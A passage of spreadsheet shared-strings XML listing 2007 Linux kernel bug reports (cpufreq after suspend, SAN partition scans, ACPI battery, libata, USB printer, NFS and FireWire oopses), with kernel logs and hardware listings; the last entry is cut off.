  </si>
  <si>
    <t>acpi-cpufreq gets very confused on suspend to ram</t>
  </si>
  <si>
    <t>2007-06-04 04:49 UTC</t>
  </si>
  <si>
    <t>Elias Oltmanns</t>
  </si>
  <si>
    <t>2011-01-18 07:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Only switched to acpi-cpufreq now. Distribution: Ubuntu 06.10 Hardware Environment: Thinkpad X40 Software Environment: Problem Description: After startup acpi-cpufreq works as expected either running the ondemand or the conservative governor. When using the conservative governor, the cpu frequency stays at full speed after a suspend to ram / resume cycle. Switching to performance and back to conservative seems to restore the usual behaviour. Even more strange are the symptoms when running the ondemand governor. A s2ram / resume cycle automatically switches to conservative, for some reason, and I made a rather thorough search in /etc to ensure that this is not due to some acpi, laptop-mode or similar script. At least, cpu frequency drops to the lowest frequency but after a second s2ram/resume cycle there it shows the same behaviour as described above, i.e., frequency stays at full speed.</t>
  </si>
  <si>
    <t>Thomas</t>
  </si>
  <si>
    <t>The automatic partition scan upon block device registration cause I/O trouble problems for other cluster nodes</t>
  </si>
  <si>
    <t>2007-06-05 12:00 UTC</t>
  </si>
  <si>
    <t>Tore Anderson</t>
  </si>
  <si>
    <t>2012-05-21 14:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: None Distribution: Debian, Ubuntu, RHEL (it applies to any distro I guess) Hardware Environment: Most kinds of low or midrange networked storage arrays Software Environment: Clusters using dm-multipath Problem Description: When a cluster is using a storage array with active/passive controllers that moves volumes when it sees I/O arriving to a passive controller, the automatic partition table scan that happens when a block device is registered often causes a volume transfer, which in turn makes I/O to the formerly active controller fail for some time (probably until the volume is completely transferred away, after which I/O wil just move it back again). This applies to many different hardware vendors like Engenio (OEM'ed by Sun/StorageTek, IBM, probably others) and EMC. In Engenio's case this "Automatic Volume Transfer" mode is the only way to use it with Linux and dm-multipath, as it's alternative mode where volumes are only transferred after an a specific SCSI command is sent that explicitly requests the volume to be transferred ("RDAC mode") is one dm-multipath does not yet have a hardware handler for. This is problematic for clusters where several machines have access to the same volume. Consider the case where machine Foo and machine Bar is happily using a volume on such an array. They're both using controller 2 for all I/O, due to dm-multipath's nice path grouping and prioritising features, and all is well. At a later time, though, Foo is rebooted, and when it is starting up it loads the fibre channel HBA driver, which finds, say, eight paths to each of the two controllers. It then proceeds to register these in the kernel as block devices, and when the block layer goes on to scan for a partition table it generates I/O to controller 1, prompting the array to move it there and making Bar experience I/O errors. When the array has completed the volume movement and Bar's dm-multipath has been able to redirect I/O there, you can be certain that Foo is well on it's way to move it back by registering another block device that represent a path through controller 2. This can go on for quite some time, depending on the complexity of the SAN and the number of volumes and hosts. In any case it's bad - until it settles down there has been very poor if any service and if dm-multipath has noted all paths as failed VFS could have seen I/O errors and remounted filesystems readonly and so on. Pain. Steps to reproduce: Reload the SCSI driver on a cluster node (or boot it) The solution seems to me to make it possible somehow to make the kernel NOT scan newly registered block devices for partition tables, and instead delegate this task to udev (which then can be used to selectively pick which devices to scan). There might be other things the block layer sends when it's being registered too, I don't know. But at least the INQUIRY, TEST UNIT READY, and READ CAPACITY commands do not cause any volume transfers, so these should be safe. At least on my EMC and Engenio gear. Regards, Tore</t>
  </si>
  <si>
    <t>Asus M6N: no battery information in &gt; 2.6.20</t>
  </si>
  <si>
    <t>2.6.22-rc4</t>
  </si>
  <si>
    <t>2007-06-08 05:05 UTC</t>
  </si>
  <si>
    <t>Mikhail Gusarov</t>
  </si>
  <si>
    <t>2008-10-17 21:35 UTC</t>
  </si>
  <si>
    <t>8477 8493 8504 8744</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20 Distribution: Debian Hardware Environment: Asus M6N notebook Problem Description: Main battery status/information is not reported: in 2.6.20 there were two directories in /proc/acpi/battery: BAT0 and BAT1 (second properly reported as missing, seems to be slot for extension battery), in 2.6.22-rc3 and rc4 there is only BAT1. .configs, dmesgs and acpidump output are attached.</t>
  </si>
  <si>
    <t>Remote of Hauppauge HVR1300 not working</t>
  </si>
  <si>
    <t>2.6.20-16-generic #2 SMP</t>
  </si>
  <si>
    <t>2007-06-08 08:48 UTC</t>
  </si>
  <si>
    <t>Frank Sagurna</t>
  </si>
  <si>
    <t>2007-07-02 13:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Ubuntu Feisty Hardware Environment: Hauppauge HVR1300 (not MCE remote) Kernel: 2.6.20-16-generic #2 SMP Problem Description: Remote Control of HVR1300 does not work. Even with loading the module with "modprobe cx88_dvb ir_debug=1" there are no messages of the remote logged. I also tried the hg repo drivers.</t>
  </si>
  <si>
    <t>ata2: failed to recover some devices</t>
  </si>
  <si>
    <t>2.6.21.4</t>
  </si>
  <si>
    <t>2007-06-10 04:35 UTC</t>
  </si>
  <si>
    <t>Soner Tari</t>
  </si>
  <si>
    <t>2007-06-26 03:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Kernels with old libata Distribution: Ubuntu Hardware Environment: Software Environment: Problem Description: If I run K3b to burn a CD, I get the following lines at the tail of dmesg: [ 451.780000] ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen [ 451.780000] ata2.00: cmd a0/01:00:00:00:00/00:00:00:00:00/a0 tag 0 cdb 0xac data 8 in [ 451.780000] res 40/00:03:00:3c:00/00:00:00:00:00/a0 Emask 0x4 (timeout) [ 451.780000] ata2: soft resetting port [ 452.082000] ata2.00: revalidation failed (errno=-2) [ 452.082000] ata2: failed to recover some devices, retrying in 5 secs [ 457.083000] ata2: soft resetting port [ 457.385000] ata2.00: revalidation failed (errno=-2) [ 457.385000] ata2: failed to recover some devices, retrying in 5 secs [ 462.386000] ata2: soft resetting port [ 462.688000] ata2.00: revalidation failed (errno=-2) [ 462.688000] ata2.00: disabled [ 463.189000] ata2: EH complete And my CD drive becomes inaccessible even for reading, until I reboot the system. I am having this problem for sometime now, please also see: https://launchpad.net/ubuntu/+bug/99018 But since then I've downloaded the latest stable vanilla kernel, hence this error report. The device is SAMSUNG CDRW/DVD SN-308B U021. If I switch to old libata kernels (/dev/hdX), there is no problem at all. Steps to reproduce: Just start K3b or Refresh the devices on K3b config page.</t>
  </si>
  <si>
    <t>USB printer shows up in /proc/bus/usb/devices, but gives ENODEV on access</t>
  </si>
  <si>
    <t>2007-06-10 06:56 UTC</t>
  </si>
  <si>
    <t>Andreas Kloeckner</t>
  </si>
  <si>
    <t>2008-09-23 13:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.2 (but downgrading now doesn't seem to fix it?) Distribution: Debian testing Hardware Environment: 00:00.0 Host bridge: ATI Technologies Inc ATI Radeon Xpress 200 (RS480/RS482/RX480/RX482) Chipset - Host bridge (rev 01) 00:02.0 PCI bridge: ATI Technologies Inc RS480 PCI-X Root Port 00:11.0 IDE interface: ATI Technologies Inc ATI 437A Serial ATA Controller 00:12.0 IDE interface: ATI Technologies Inc ATI 4379 Serial ATA Controller 00:13.0 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller 00:13.1 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller 00:13.2 USB Controller: ATI Technologies Inc IXP SB400 USB2 Host Controller 00:14.0 SMBus: ATI Technologies Inc IXP SB400 SMBus Controller (rev 11) 00:14.1 IDE interface: ATI Technologies Inc Standard Dual Channel PCI IDE Controller ATI 00:14.3 ISA bridge: ATI Technologies Inc IXP SB400 PCI-ISA Bridge 00:14.4 PCI bridge: ATI Technologies Inc IXP SB400 PCI-PCI Bridge 00:14.5 Multimedia audio controller: ATI Technologies Inc IXP SB400 AC'97 Audio Controller (rev 02) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:00.0 VGA compatible controller: nVidia Corporation NV44 [GeForce 6200 TurboCache(TM)] (rev a1) 02:02.0 Multimedia controller: Philips Semiconductors SAA7130 Video Broadcast Decoder (rev 01) 02:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) 02:05.0 Ethernet controller: Atheros Communications, Inc. AR5005G 802.11abg NIC (rev 01) Problem Description: I have a USB printer (Samsung ML-2010) that, when I plug it in, shows up in /proc/bus/usb/devices (and gets detected according to dmesg), but when I try to access any device file related to it, I get "Error: no such device". (For example, echo "blech" &gt; /dev/usb/lp0.) Accordingly, the printer does not show up in lsusb and CUPS also thinks that it's disconnected. The printer (and cable) work fine on my IBM Thinkpad R52.</t>
  </si>
  <si>
    <t>test bug to test upgraded bugzilla</t>
  </si>
  <si>
    <t>P1 normal</t>
  </si>
  <si>
    <t>2007-06-11 14:51 UTC</t>
  </si>
  <si>
    <t>2007-06-11 14:53 UTC</t>
  </si>
  <si>
    <t>Lets see if a new bug creation works too.</t>
  </si>
  <si>
    <t>kernel BUG at fs/nfs/namespace.c:108!</t>
  </si>
  <si>
    <t>2.6.22-rc4 (99f9f3d49cbc7d944476f6fde53a77ec789ab2aa)?</t>
  </si>
  <si>
    <t>2007-06-12 04:42 UTC</t>
  </si>
  <si>
    <t>Peter Barker</t>
  </si>
  <si>
    <t>2010-02-03 20:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:Ubuntu Hardware Environment:Athlon Thunderbird Software Environment:GNU Problem Description: kernel BUG at fs/nfs/namespace.c:108! invalid opcode: 0000 [#1] Modules linked in: nfs nfsd exportfs lockd sunrpc apm md_mod af_packet snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_event snd_seq_midi_emul snd_emu10k1 snd_rawmidi firmware_class snd_ac97_codec ac97_bus floppy snd_pcm snd_page_alloc snd_util_mem 8139cp 8139too snd_hwdep CPU: 0 EIP: 0060:[&lt;d0ab2f3e&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.22-rc4 #4) EIP is at nfs_follow_mountpoint+0x37/0x339 [nfs] eax: c7087a00 ebx: c4addd70 ecx: d0ac4a60 edx: c4943f04 esi: c4943f04 edi: c4622584 ebp: c4c75ce0 esp: c4943cb4 ds: 007b es: 007b fs: 0000 gs: 0033 ss: 0068 Process bash (pid: 3967, ti=c4942000 task=ca3c9590 task.ti=c4942000) Stack: 00000001 c4943ce8 0115f89e 00000020 00000002 c1200760 004a3001 00000000 cd6096ec c11ac500 004900de c015f1c5 00000002 ccd7b47c c015fa16 00000001 ca39913c ca1bb754 00000000 c123dc60 cd6096ec c015f423 cd6096ec ccd7b47c Call Trace: [&lt;c015f1c5&gt;] __find_get_block_slow+0xd3/0xdd [&lt;c015fa16&gt;] ll_rw_block+0x7a/0x89 [&lt;c015f423&gt;] __find_get_block+0xf6/0x120 [&lt;c015f461&gt;] __getblk+0x14/0x19b [&lt;d081b314&gt;] rtl8139_interrupt+0x28c/0x3a4 [8139too] [&lt;d081b314&gt;] rtl8139_interrupt+0x28c/0x3a4 [8139too] [&lt;c024c1a5&gt;] tcp_cong_avoid+0x21/0x31 [&lt;c024e5e4&gt;] tcp_ack+0x1506/0x1687 [&lt;c015449c&gt;] __d_lookup+0x8b/0xbf [&lt;c0153a5e&gt;] dput+0x15/0xcb [&lt;c014c723&gt;] __follow_mount+0x1e/0x5f [&lt;c014c7b3&gt;] do_lookup+0x4f/0x140 [&lt;c014de2f&gt;] __link_path_walk+0x723/0xa01 [&lt;c014e14f&gt;] link_path_walk+0x42/0xaf [&lt;c014e3f0&gt;] do_path_lookup+0x131/0x14c [&lt;c014d498&gt;] getname+0x59/0x8f [&lt;c014eba7&gt;] __user_walk_fd+0x2f/0x45 [&lt;c0149858&gt;] vfs_stat_fd+0x19/0x40 [&lt;c014990c&gt;] sys_stat64+0xf/0x23 [&lt;c0102276&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: 00 00 8b 40 08 f6 05 2c e2 a0 d0 01 8b 80 88 00 00 00 8b a8 48 01 00 00 74 0c c7 04 24 64 7a ac d0 e8 bc f7 65 ef 3b 5b 14 75 04 &lt;0f&gt; 0b eb fe f6 05 2c e2 a0 d0 01 74 14 c7 44 24 04 14 4b ac d0 EIP: [&lt;d0ab2f3e&gt;] nfs_follow_mountpoint+0x37/0x339 [nfs] SS:ESP 0068:c4943cb4 Steps to reproduce: peterlocal@lynx:~$ sudo modprobe nfs peterlocal@lynx:~$ sudo mount milligan:/ /mnt/spare2 -tnfs4 Warning: rpc.idmapd appears not to be running. All uids will be mapped to the nobody uid. peterlocal@lynx:~$ cd /mnt/spare2 Connection to lynx closed. (the shell was killed, dmesg shows the BUG() call) The server looks like this: pbarker@milligan:~$ cat /etc/fstab | tail -2 # extra stuff for the nfs mounts: /mnt/raid/media /srv/nfs/media none rw,bind 0 0 pbarker@milligan:~$ /usr/sbin/exportfs | grep srv /srv/nfs/media 10.17.1.36/255.255.255.255 /srv/nfs 10.17.1.36/255.255.255.255 /srv/nfs 10.17.1.0/255.255.255.0 pbarker@milligan:~$ pbarker@milligan:~$ ls /srv/nfs media/ pbarker@milligan:~$ ls /srv/nfs/media anim/ mp3s-other/ ogg-david/ tulip.wrl ...</t>
  </si>
  <si>
    <t>P1 high</t>
  </si>
  <si>
    <t>Patrick Matthäi</t>
  </si>
  <si>
    <t>(fw_core) Kernel ooops and system freeze when trying to access a Sony HandyCam using a VIA chipset FireWire card</t>
  </si>
  <si>
    <t>Fedora</t>
  </si>
  <si>
    <t>2007-06-13 11:27 UTC</t>
  </si>
  <si>
    <t>Mauro M.</t>
  </si>
  <si>
    <t>2007-09-04 08:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: not tried with more recent kernel Distribution: Fedora Core 7 Hardware Environment: Arima HDAMB Dual Opteron; 2 x Opteron 246-HE Stepping 0a; FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 46); Sony HandyCam DCR-HC35 (I do not have any other firewire devices available to test with). The FireWire adapter is on a PCI card as the version of this motherboard in my possess does not have an on-board chip. Software Environment: kino, dvgrab Problem Description: When trying to capture from camera the following is logged and system freezes requiring a reset to re-boot: [...] Jun 13 18:21:02 mars kernel: Unable to handle kernel paging request at ffffffffffffffea RIP: Jun 13 18:21:02 mars kernel: [&lt;ffffffff881edbec&gt;] :fw_core:fw_iso_context_destroy+0x0/0xd Jun 13 18:21:02 mars kernel: PGD 203027 PUD 2c0e067 PMD 0 Jun 13 18:21:02 mars kernel: Oops: 0000 [1] SMP Jun 13 18:21:02 mars kernel: last sysfs file: /devices/platform/i2c-9191/9191-0600/in8_input Jun 13 18:21:02 mars kernel: CPU 0 Jun 13 18:21:02 mars kernel: Modules linked in: fw_sbp2 ipt_MASQUERADE iptable_nat nf_nat bridge autofs4 pc87360 hwmon_vid i2c_isa eeprom nfs lockd nfs_acl vmnet(P)(U) vmblock(P)(U) vmmon(P)(U) sunrpc nf_conntrack_netbios_ns ipt_REJECT nf_conntrack_ipv4 xt_state nf_conntrack nfnetlink xt_tcpudp iptable_filter ip_tables x_tables radeon drm ipv6 xfs dm_mirror dm_mod video sbs i2c_ec button dock battery ac lp loop sr_mod cdrom snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss ata_generic snd_seq_midi_event snd_seq snd_seq_device fw_ohci snd_pcm_oss 3c59x fw_core tg3 snd_mixer_oss mii snd_pcm i2c_amd756 snd_timer i2c_core floppy snd parport_pc soundcore k8temp hwmon k8_edac edac_mc serio_raw parport snd_page_alloc pata_amd amd_rng st sg pcspkr aic7xxx scsi_transport_spi shpchp sata_sil libata sd_mod scsi_mod ext3 jbd mbcache ehci_hcd ohci_hcd uhci_hcd Jun 13 18:21:02 mars kernel: Pid: 3967, comm: kino Tainted: P 2.6.21-1.3194.fc7 #1 Jun 13 18:21:02 mars kernel: RIP: 0010:[&lt;ffffffff881edbec&gt;] [&lt;ffffffff881edbec&gt;] :fw_core:fw_iso_context_destroy+0x0/0xd Jun 13 18:21:02 mars kernel: RSP: 0018:ffff81004e35bee0 EFLAGS: 00010282 Jun 13 18:21:02 mars kernel: RAX: ffffffff881eeec9 RBX: 0000000000000008 RCX: 000000000000000c Jun 13 18:21:02 mars kernel: RDX: 0000000000000012 RSI: ffff81005e713ec0 RDI: ffffffffffffffea Jun 13 18:21:02 mars kernel: RBP: ffff81004e247e80 R08: 00000000ffffffff R09: ffff81007db1a118 Jun 13 18:21:02 mars kernel: R10: ffff81005e713ec0 R11: 0000000000000202 R12: ffff81007db1a118 Jun 13 18:21:02 mars kernel: R13: ffff81007db1a118 R14: ffff81007ff54180 R15: ffff81007ce10a40 Jun 13 18:21:02 mars kernel: FS: 0000000041e02950(0063) GS:ffffffff8059c000(0000) knlGS:0000000000000000 Jun 13 18:21:02 mars kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jun 13 18:21:02 mars kernel: CR2: ffffffffffffffea CR3: 0000000050ce9000 CR4: 00000000000006e0 Jun 13 18:21:02 mars kernel: Process kino (pid: 3967, threadinfo ffff81004e35a000, task ffff810058dd3100) Jun 13 18:21:02 mars kernel: Stack: ffffffff881eeefc 0000000000000008 0000000000000008 ffff81005e713ec0 Jun 13 18:21:02 mars kernel: ffffffff8021140b 0000000000000000 ffff81005e713ec0 ffff81005863d080 Jun 13 18:21:02 mars kernel: 0000000000000000 00000000000003e8 000000000000003f 00000000ffffffff Jun 13 18:21:02 mars kernel: Call Trace: Jun 13 18:21:02 mars kernel: [&lt;ffffffff881eeefc&gt;] :fw_core:fw_device_op_release+0x33/0xd0 Jun 13 18:21:02 mars kernel: [&lt;ffffffff8021140b&gt;] __fput+0xc2/0x191 Jun 13 18:21:02 mars kernel: [&lt;ffffffff80222848&gt;] filp_close+0x5d/0x65 Jun 13 18:21:02 mars kernel: [&lt;ffffffff8021c581&gt;] sys_close+0x8c/0xc9 Jun 13 18:21:02 mars kernel: [&lt;ffffffff8025729c&gt;] tracesys+0xdc/0xe1 Jun 13 18:21:02 mars kernel: Jun 13 18:21:02 mars kernel: Jun 13 18:21:02 mars kernel: Code: 48 8b 07 48 8b 00 4c 8b 58 50 41 ff e3 48 8b 07 48 8b 00 4c Jun 13 18:21:02 mars kernel: RIP [&lt;ffffffff881edbec&gt;] :fw_core:fw_iso_context_destroy+0x0/0xd Jun 13 18:21:02 mars kernel: RSP &lt;ffff81004e35bee0&gt; Jun 13 18:21:02 mars kernel: CR2: ffffffffffffffea Jun 13 18:23:18 mars kernel: fw_core: created new fw device fw1 (0 config rom retries) Jun 13 18:23:18 mars kernel: fw_core: phy config: card 0, new root=ffc1, gap_count=5 Jun 13 18:23:49 mars last message repeated 27 times Jun 13 18:23:54 mars last message repeated 4 times Jun 13 18:23:55 mars kernel: fw_core: Unsolicited response (source ffc0, tlabel f) Jun 13 18:23:55 mars kernel: fw_core: phy config: card 0, new root=ffc1, gap_count=5 Jun 13 18:24:11 mars last message repeated 14 times Jun 13 18:24:11 mars kernel: Unable to handle kernel paging request at ffffffffffffffea RIP: Jun 13 18:24:11 mars kernel: [&lt;ffffffff881edbec&gt;] :fw_core:fw_iso_context_destroy+0x0/0xd Jun 13 18:24:11 mars kernel: PGD 203027 PUD 2c0e067 PMD 0 Jun 13 18:24:11 mars kernel: Oops: 0000 [2] SMP Jun 13 18:24:11 mars kernel: last sysfs file: /devices/platform/i2c-9191/9191-0600/in8_input Jun 13 18:24:11 mars kernel: CPU 0 Jun 13 18:24:11 mars kernel: Modules linked in: fw_sbp2 ipt_MASQUERADE iptable_nat nf_nat bridge autofs4 pc87360 hwmon_vid i2c_isa eeprom nfs lockd nfs_acl vmnet(P)(U) vmblock(P)(U) vmmon(P)(U) sunrpc nf_conntrack_netbios_ns ipt_REJECT nf_conntrack_ipv4 xt_state nf_conntrack nfnetlink xt_tcpudp iptable_filter ip_tables x_tables radeon drm ipv6 xfs dm_mirror dm_mod video sbs i2c_ec button dock battery ac lp loop sr_mod cdrom snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss ata_generic snd_seq_midi_event snd_seq snd_seq_device fw_ohci snd_pcm_oss 3c59x fw_core tg3 snd_mixer_oss mii snd_pcm i2c_amd756 snd_timer i2c_core floppy snd parport_pc soundcore k8temp hwmon k8_edac edac_mc serio_raw parport snd_page_alloc pata_amd amd_rng st sg pcspkr aic7xxx scsi_transport_spi shpchp sata_sil libata sd_mod scsi_mod ext3 jbd mbcache ehci_hcd ohci_hcd uhci_hcd Jun 13 18:24:11 mars kernel: Pid: 4153, comm: kino Tainted: P 2.6.21-1.3194.fc7 #1 Jun 13 18:24:11 mars kernel: RIP: 0010:[&lt;ffffffff881edbec&gt;] [&lt;ffffffff881edbec&gt;] :fw_core:fw_iso_context_destroy+0x0/0xd Jun 13 18:24:11 mars kernel: RSP: 0018:ffff8100617bdee0 EFLAGS: 00010282 Jun 13 18:24:11 mars kernel: RAX: ffffffff881eeec9 RBX: 0000000000000008 RCX: 000000000000000f Jun 13 18:24:12 mars kernel: RDX: 0000000000000002 RSI: ffff8100512920c0 RDI: ffffffffffffffea Jun 13 18:24:12 mars kernel: RBP: ffff81006adc3180 R08: 00000000ffffffff R09: ffff81007db1a118 Jun 13 18:24:12 mars kernel: R10: ffff8100512920c0 R11: 0000000000000202 R12: ffff81007db1a118 Jun 13 18:24:12 mars kernel: R13: ffff81007db1a118 R14: ffff81007ff54180 R15: ffff81007ce10a40 Jun 13 18:24:12 mars kernel: FS: 0000000041e02950(0063) GS:ffffffff8059c000(0000) knlGS:0000000000000000 Jun 13 18:24:12 mars kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jun 13 18:24:12 mars kernel: CR2: ffffffffffffffea CR3: 000000004e715000 CR4: 00000000000006e0 Jun 13 18:24:12 mars kernel: Process kino (pid: 4153, threadinfo ffff8100617bc000, task ffff810058d267e0) Jun 13 18:24:12 mars kernel: Stack: ffffffff881eeefc 0000000000000008 0000000000000008 ffff8100512920c0 Jun 13 18:24:12 mars kernel: ffffffff8021140b 0000000000000000 ffff8100512920c0 ffff810050c299c0 Jun 13 18:24:12 mars kernel: 0000000000000000 00000000000003e8 000000000000003f 00000000ffffffff Jun 13 18:24:12 mars kernel: Call Trace: Jun 13 18:24:12 mars kernel: [&lt;ffffffff881eeefc&gt;] :fw_core:fw_device_op_release+0x33/0xd0 Jun 13 18:24:12 mars kernel: [&lt;ffffffff8021140b&gt;] __fput+0xc2/0x191 Jun 13 18:24:12 mars kernel: [&lt;ffffffff80222848&gt;] filp_close+0x5d/0x65 Jun 13 18:24:12 mars kernel: [&lt;ffffffff8021c581&gt;] sys_close+0x8c/0xc9 Jun 13 18:24:12 mars kernel: [&lt;ffffffff8025729c&gt;] tracesys+0xdc/0xe1 Jun 13 18:24:12 mars kernel: Jun 13 18:24:12 mars kernel: Jun 13 18:24:12 mars kernel: Code: 48 8b 07 48 8b 00 4c 8b 58 50 41 ff e3 48 8b 07 48 8b 00 4c Jun 13 18:24:12 mars kernel: RIP [&lt;ffffffff881edbec&gt;] :fw_core:fw_iso_context_destroy+0x0/0xd Jun 13 18:24:12 mars kernel: RSP &lt;ffff8100617bdee0&gt; Jun 13 18:24:12 mars kernel: CR2: ffffffffffffffea Jun 13 18:24:12 mars kernel: fw_core: phy config: card 0, new root=ffc1, gap_count=5 Jun 13 18:24:43 mars last message repeated 27 times Jun 13 18:51:51 mars syslogd 1.4.2: restart. Jun 13 18:51:51 mars kernel: klogd 1.4.2, log source = /proc/kmsg started. Jun 13 18:51:51 mars kernel: Linux version 2.6.21-1.3194.fc7 (kojibuilder@hammer2.fedora.redhat.com) (gcc version 4.1.2 20070502 (Red Hat 4.1.2-12)) #1 SMP Wed May 23 22:47:07 EDT 2007 [...] Steps to reproduce: use kino or dvgrab to capture from firewire camera on the hardware configuration above. Further information: # lspci 00:01.0 Host bridge: Advanced Micro Devices [AMD] AMD-8151 System Controller (rev 13) 00:02.0 PCI bridge: Advanced Micro Devices [AMD] AMD-8151 AGP Bridge (rev 13) 00:06.0 PCI bridge: Advanced Micro Devices [AMD] AMD-8111 PCI (rev 07) 00:07.0 ISA bridge: Advanced Micro Devices [AMD] AMD-8111 LPC (rev 05) 00:07.1 IDE interface: Advanced Micro Devices [AMD] AMD-8111 IDE (rev 03) 00:07.3 Bridge: Advanced Micro Devices [AMD] AMD-8111 ACPI (rev 05) 00:07.5 Multimedia audio controller: Advanced Micro Devices [AMD] AMD-8111 AC97 Audio (rev 03) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technolog y Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 00:19.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technolog y Configuration 00:19.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:19.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:19.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200] (rev 01) 01:00.1 Display controller: ATI Technologies Inc RV280 [Radeon 9200] (Secondary) (rev 01) 02:00.0 USB Controller: Advanced Micro Devices [AMD] AMD-8111 USB (rev 0b) 02:00.1 USB Controller: Advanced Micro Devices [AMD] AMD-8111 USB (rev 0b) 02:02.0 SCSI storage controller: Adaptec AHA-2940U/UW/D / AIC-7881U 02:03.0 SCSI storage controller: Adaptec AHA-2944UW / AIC-7884U (rev 01) 02:04.0 RAID bus controller: Silicon Image, Inc. SiI 3114 [SATALink/SATARaid] Serial ATA Control ler (rev 02) 02:06.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5702X Gigabit Ethernet (rev 02) 02:08.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 50) 02:08.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 50) 02:08.2 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 51) 02:09.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 46) 02:0a.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) Please, let me know should you require further information.</t>
  </si>
  <si>
    <t>randomly a stuttering in the music (caused by HSM violation?)</t>
  </si>
  <si>
    <t>2007-06-14 02:50 UTC</t>
  </si>
  <si>
    <t>Bjoern Olausson</t>
  </si>
  <si>
    <t>2007-07-02 03:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge: Intel Corporation 82975X Memory Controller Hub (rev c0) 00:01.0 PCI bridge: Intel Corporation 82975X PCI Express Root Port (rev c0) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01) 00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 01) 00:1c.5 PCI bridge: Intel Corporation 82801GR/GH/GHM (ICH7 Family) PCI Express Port 6 (rev 01) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 01) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev e1) 00:1f.0 ISA bridge: Intel Corporation 82801GB/GR (ICH7 Family) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 01) 00:1f.2 SATA controller: Intel Corporation 82801GR/GH (ICH7 Family) SATA AHCI Controller (rev 01) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 01) 01:00.0 Multimedia audio controller: Creative Labs SB X-Fi 01:01.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 01:01.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) 01:02.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) 01:03.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 02:00.0 SATA controller: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) 02:00.1 IDE interface: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) 03:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 20) 05:00.0 VGA compatible controller: nVidia Corporation G70 [GeForce 7600 GT] (rev a1) Software Environment: Portage 2.1.2.7 (default-linux/amd64/2006.1, gcc-4.1.2, glibc-2.5-r3, 2.6.21.5 x86_64) ================================================================= System 